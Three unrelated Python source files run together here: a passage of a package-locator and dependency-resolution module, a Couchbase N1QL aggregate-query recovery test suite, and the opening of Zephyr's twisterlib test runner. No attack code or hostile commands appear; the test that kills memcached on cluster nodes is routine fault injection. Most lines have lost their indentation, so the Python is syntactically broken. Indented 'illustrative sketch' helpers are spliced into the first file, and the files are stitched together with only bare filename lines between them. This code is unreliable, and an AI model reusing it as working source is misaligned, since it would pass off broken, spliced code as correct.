url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
        Get the HTML for a URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
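# Illustrative sketch (not part of the original module): how SimpleScrapingLocator
# can be used on its own. The index URL and the requirement string below are
# assumptions; any PEP 503 "simple" index and any published project name work.
def _example_simple_scraping_locator():
    # Scrape the index for the newest distribution matching the requirement.
    locator = SimpleScrapingLocator('https://pypi.org/simple/', timeout=3.0)
    dist = locator.locate('requests (>= 2.0)')   # a Distribution, or None if not found
    if dist is None:
        return None
    return dist.name, dist.version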
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
                           is searched.
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
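# Illustrative sketch (not part of the original module): pointing a
# DirectoryLocator at a local folder of sdists/wheels. The path argument is a
# caller-supplied assumption and must be an existing directory.
def _example_directory_locator(path):
    locator = DirectoryLocator(path, recursive=True)
    # All project names whose archives were found under the tree.
    return sorted(locator.get_distribution_names())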
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.python.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
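# Illustrative sketch (not part of the original module): using the module-level
# ``locate`` convenience function defined just above. The requirement string is
# an arbitrary example, not taken from the source.
def _example_locate():
    dist = locate('pip (>= 20.0)')   # tries the JSON metadata locator first, then the scraper
    return None if dist is None else (dist.name, dist.version)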
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
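# Illustrative sketch (not part of the original module): resolving a dependency
# closure with DependencyFinder. It needs network access for the default locator;
# the requirement string is an arbitrary example.
def _example_dependency_finder():
    finder = DependencyFinder()                      # uses default_locator
    dists, problems = finder.find('requests (>= 2.0)')
    names = {d.name_and_version for d in dists}      # everything pulled in
    return names, problems                           # problems is a set of tuples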
|
n1ql_aggregate_pushdown_recovery.py
|
import itertools
import logging
import threading
from couchbase_helper.tuq_helper import N1QLHelper
from membase.api.rest_client import RestConnection
from remote.remote_util import RemoteMachineShellConnection
from tuq import QueryTests
log = logging.getLogger(__name__)
AGGREGATE_FUNCTIONS = ["SUM", "MIN", "MAX", "COUNT", "COUNTN", "AVG"]
DISTINCT_AGGREGATE_FUNCTIONS = ["SUM", "COUNT", "AVG"]
class AggregatePushdownRecoveryClass(QueryTests):
def setUp(self):
super(AggregatePushdownRecoveryClass, self).setUp()
self.n1ql_helper = N1QLHelper(master=self.master)
self.n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
self.aggr_distinct = self.input.param("aggr_distinct", False)
self.graceful = self.input.param("graceful", False)
def tearDown(self):
super(AggregatePushdownRecoveryClass, self).tearDown()
def test_indexer_rebalance_in(self):
self.find_nodes_in_list()
index_names_defn = self._create_array_index_definitions()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], self.nodes_in_list,
[], services=self.services_in)
mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
rebalance.result()
mid_recovery_tasks.join()
#check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
self._aggregate_query_using_index(index_names_defn)
        except Exception as ex:
log.info(str(ex))
raise
def test_indexer_rebalance_out(self):
self.generate_map_nodes_out_dist()
index_names_defn = self._create_array_index_definitions()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], self.nodes_out_list)
mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
rebalance.result()
mid_recovery_tasks.join()
# Check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
self._aggregate_query_using_index(index_names_defn)
        except Exception as ex:
log.info(str(ex))
raise
def test_indexer_rebalance_in_out(self):
self.find_nodes_in_list()
self.generate_map_nodes_out_dist()
index_names_defn = self._create_array_index_definitions()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
rebalance.result()
mid_recovery_tasks.join()
# Check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
        except Exception as ex:
log.info(str(ex))
raise
def test_server_crash(self):
self.generate_map_nodes_out_dist()
index_names_defn = self._create_array_index_definitions()
try:
            self.targetProcess = self.input.param("targetProcess", 'memcached')
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
if self.targetProcess == "memcached":
remote.kill_memcached()
else:
remote.terminate_process(process_name=self.targetProcess)
self.sleep(60)
if "n1ql" not in self.nodes_out_dist:
mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
mid_recovery_tasks.join()
#check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
        except Exception as ex:
log.info(str(ex))
raise
def test_indexer_failover_add_back(self):
rest = RestConnection(self.master)
self.generate_map_nodes_out_dist()
index_names_defn = self._create_array_index_definitions()
try:
failover_task =self.cluster.async_failover([self.master],
failover_nodes=self.nodes_out_list,
graceful=self.graceful)
failover_task.result()
nodes_all = rest.node_statuses()
nodes = []
if self.nodes_out_list:
if self.nodes_out_list[0].ip == "127.0.0.1":
for failover_node in self.nodes_out_list:
nodes.extend([node for node in nodes_all if (str(node.port) == failover_node.port)])
else:
for failover_node in self.nodes_out_list:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip])
for node in nodes:
log.info("Adding back {0} with recovery type Full...".format(node.ip))
rest.add_back_node(node.id)
rest.set_recovery_type(otpNode=node.id, recoveryType="full")
log.info("Rebalancing nodes in...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
mid_recovery_tasks = threading.Thread(target=self._aggregate_query_using_index, args=(index_names_defn,))
mid_recovery_tasks.start()
rebalance.result()
mid_recovery_tasks.join()
#check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self._wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(60)
        except Exception as ex:
log.info(str(ex))
raise
def _create_array_index_definitions(self):
index_fields = [{"name": "name", "where_clause": "name = 'Kala'"},
{"name": "age", "where_clause": "age < 85"},
{"name": "debt", "where_clause": "debt > -500000"}]
indexes = []
for first_field in index_fields:
for second_field in index_fields:
if first_field == second_field:
continue
for third_field in index_fields:
if second_field == third_field or first_field == third_field:
continue
index_names_defn = {}
index_name = "{0}_{1}_{2}".format(first_field["name"], second_field["name"], third_field["name"])
index_names_defn["index_name"] = index_name
index_names_defn["fields"] = [first_field, second_field, third_field]
create_index_clause = "CREATE INDEX {0} on %s({1}, {2}, {3})".format(
index_name, first_field["name"], second_field["name"], third_field["name"])
drop_index_clause = "DROP INDEX %s.{0}".format(index_name)
index_names_defn["create_definitions"] = [(create_index_clause % bucket.name) for bucket in self.buckets]
index_names_defn["drop_definitions"] = [(drop_index_clause % bucket.name) for bucket in self.buckets]
for create_def in index_names_defn["create_definitions"]:
result = self.run_cbq_query(create_def)
indexes.append(index_names_defn)
return indexes
def _aggregate_query_using_index(self, index_names_defn):
failed_queries_in_result = []
for index_name_def in index_names_defn:
query_definitions = []
index_fields = index_name_def["fields"]
for aggr_func in AGGREGATE_FUNCTIONS:
select_clause = "SELECT " + aggr_func + "({0}) from %s where {1} GROUP BY {2}"
query_definitions = [select_clause.format(tup[0]["name"], tup[1]["where_clause"], index_fields[0]["name"])
for tup in itertools.permutations(index_fields)]
for bucket in self.buckets:
for query_definition in query_definitions:
query = query_definition % bucket.name
result = self.run_cbq_query(query)
query_verification = self._verify_aggregate_query_results(result, query_definition,
bucket.name)
if not query_verification:
failed_queries_in_result.append(query)
self.assertEqual(len(failed_queries_in_result), 0, "Failed Queries: {0}".format(failed_queries_in_result))
def _wait_until_cluster_is_healthy(self):
master_node = self.master
if self.targetMaster:
if len(self.servers) > 1:
master_node = self.servers[1]
rest = RestConnection(master_node)
is_cluster_healthy = False
count = 0
while not is_cluster_healthy and count < 10:
count += 1
cluster_nodes = rest.node_statuses()
for node in cluster_nodes:
if node.status != "healthy":
is_cluster_healthy = False
log.info("Node {0} is in {1} state...".format(node.ip,
node.status))
self.sleep(5)
break
else:
is_cluster_healthy = True
return is_cluster_healthy
def _verify_aggregate_query_results(self, result, query, bucket):
def _gen_dict(res):
result_set = []
if res is not None and len(res) > 0:
for val in res:
for key in val.keys():
result_set.append(val[key])
return result_set
self.restServer = self.get_nodes_from_services_map(service_type="n1ql")
self.rest = RestConnection(self.restServer)
self.rest.set_query_index_api_mode(1)
query = query % bucket
primary_result = self.run_cbq_query(query)
self.rest.set_query_index_api_mode(3)
self.log.info(" Analyzing Actual Result")
actual_result = _gen_dict(sorted(primary_result["results"]))
self.log.info(" Analyzing Expected Result")
expected_result = _gen_dict(sorted(result["results"]))
if len(actual_result) != len(expected_result):
return False
if actual_result != expected_result:
return False
return True
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from datetime import datetime
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
    if os.name == "nt":  # "nt" means the program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
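# Minimal sketch (not part of the original file) of how ExecutionCounter is meant
# to be used: each counter is a multiprocessing.Value guarded by its own lock, so
# the property getters and setters are safe to call from worker processes.
def _example_execution_counter():
    results = ExecutionCounter(total=10)
    results.done += 1        # the read and the write each take the Value's lock
    results.passed += 1
    results.summary()        # logs the totals through the 'twister' logger
    return results.done, results.passed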
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
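# Minimal sketch (not part of the original file) of the conversions described in
# the CMakeCacheEntry docstring above. The entry names are made up for illustration.
def _example_cmake_cache_entry():
    e_bool = CMakeCacheEntry.from_line('CONFIG_FOO:BOOL=ON', 1)    # BOOL value becomes truthy (1)
    e_list = CMakeCacheEntry.from_line('SRCS:STRING=a.c;b.c', 2)   # ';' turns the value into ['a.c', 'b.c']
    e_none = CMakeCacheEntry.from_line('// a comment line', 3)     # comment lines yield None
    return e_bool, e_list, e_none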
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
